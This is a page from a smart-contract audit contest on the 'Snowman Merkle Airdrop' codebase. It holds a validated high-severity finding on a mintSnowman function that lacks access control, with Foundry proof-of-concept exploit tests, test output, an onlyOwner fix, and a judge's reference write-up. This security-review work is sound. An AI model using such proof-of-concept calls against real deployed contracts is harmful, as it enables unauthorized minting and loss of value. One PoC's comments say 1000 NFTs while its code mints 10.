Snowman Merkle Airdrop
AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing access control on `Snowman::mintSnowman` allows unlimited free NFT minting

hackinghacked674

Root + Impact

Root: Snowman::mintSnowman lacks access control, allowing any external caller to mint NFTs directly

Impact: The entire Snow token economy and airdrop mechanism are bypassed — NFTs can be obtained for free without purchasing or staking Snow tokens

Description

The intended flow requires users to hold Snow tokens and call SnowmanAirdrop::claimSnowman,
which internally calls Snowman::mintSnowman to distribute NFTs proportional to the user's Snow balance.

However, Snowman::mintSnowman has no access control — no modifier, no caller check,
and no validation that the caller is the SnowmanAirdrop contract.
This allows anyone to call it directly and mint unlimited NFTs for free,
completely bypassing the Snow token purchase and airdrop claim process.

function mintSnowman(address receiver, uint256 amount) external {
@> // No access control — anyone can call this function
for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Risk

Likelihood:

  • Any external account can call Snowman::mintSnowman at any time with arbitrary parameters

  • No special conditions, timing, or prerequisites are needed

Impact:

  • The entire Snow token economy is rendered worthless — there is no incentive to buy or earn Snow tokens when NFTs can be minted for free

  • The Merkle tree airdrop mechanism in SnowmanAirdrop is completely bypassed, making the contract purposeless

Proof of Concept

The following Foundry test demonstrates that an attacker with zero Snow tokens
can directly call mintSnowman to mint arbitrary NFTs:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test, console2} from "forge-std/Test.sol";
import {Snowman} from "../src/Snowman.sol";
import {Snow} from "../src/Snow.sol";
import {DeploySnowman} from "../script/DeploySnowman.s.sol";
import {DeploySnow} from "../script/DeploySnow.s.sol";
contract PoC_H1_MintSnowmanNoAccessControl is Test {
Snowman snowman;
Snow snow;
address attacker = makeAddr("attacker");
function setUp() public {
DeploySnowman snowmanDeployer = new DeploySnowman();
snowman = snowmanDeployer.run();
DeploySnow snowDeployer = new DeploySnow();
snow = snowDeployer.run();
}
function test_anyoneCanMintSnowmanWithoutSnowTokens() public {
// ① Setup — attacker has no Snow tokens and no NFTs
assertEq(snow.balanceOf(attacker), 0, "Attacker should have 0 Snow tokens");
assertEq(snowman.balanceOf(attacker), 0, "Attacker should have 0 NFTs");
// ② Attack — call mintSnowman directly, bypassing SnowmanAirdrop entirely
uint256 mintAmount = 10;
vm.prank(attacker);
snowman.mintSnowman(attacker, mintAmount);
// ③ Verify — attacker got 1000 NFTs without any Snow tokens or payment
assertEq(snow.balanceOf(attacker), 0, "Attacker still has 0 Snow tokens");
assertEq(snowman.balanceOf(attacker), mintAmount, "Attacker minted 1000 NFTs for free");
console2.log("Snow token balance:", snow.balanceOf(attacker));
console2.log("NFT balance:", snowman.balanceOf(attacker));
}
}

Recommended Mitigation

Add onlyOwner modifier to restrict mintSnowman to the contract owner
(the SnowmanAirdrop contract). The owner should then call this function
only through the claimSnowman flow after verifying Merkle proofs and signatures.

+ import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!